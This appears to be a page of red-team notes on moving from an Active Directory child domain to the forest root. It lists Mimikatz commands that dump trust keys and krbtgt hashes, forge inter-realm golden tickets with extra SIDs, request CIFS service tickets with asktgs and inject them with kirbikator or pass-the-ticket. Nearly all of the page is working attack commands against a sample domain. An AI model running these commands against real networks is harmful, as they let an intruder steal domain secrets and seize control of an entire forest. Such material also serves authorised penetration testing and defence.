privilege_escalation_across_trusts
PRIVILEGE ESCALATION ACROSS TRUSTS Privilege Escalation Across Trusts
Child to Forest Root
Domains in same Forest have an implicit two-way trust with the Forest Root
There is a trust key between the parent and child domains
There are two ways of escalating privileges between two domains of the same forest
KRBTGT hash
Trust Tickets
Forging Trust Tickets Child to Forest Root
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
Once we have the Trust Key, let's forge and interrealm TGT
Invoke-Mimikatz -Command '"Kerberos::golden /domain:victim.local /sid: /sids: /rc4: /user:Administrator /service:krbtgt /target: /ticket:"'
Getting a TGS for a service such as CIFS by using the forged trust ticket
.\asktgs.exe C:\Users\pathToTicket.kirbi CIFS/victim.local
Tickets for other services like Host and RPCSS for WMI, HOST ans HTTP for Powershell Remoting and WinRM can also be created
Once we have the TGS for a service, we can ise the TGS to access the targeted service with the following
.\kirbikator.exe lsa .\CIFS.victim.local.kirbi ls \dc01.victim.local\C$
Forging a ticket from Child Domain to Forest Root using krbtgt hash
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain: /sid:<child domain SID /krbtgt: /sids: /ticket:
On a machine of the parent domain you wanna get into
Invoke-Mimikatz -Command '"kerberos::ptt C:\locationof.kirbi_file"'
Last updated
Was this helpful?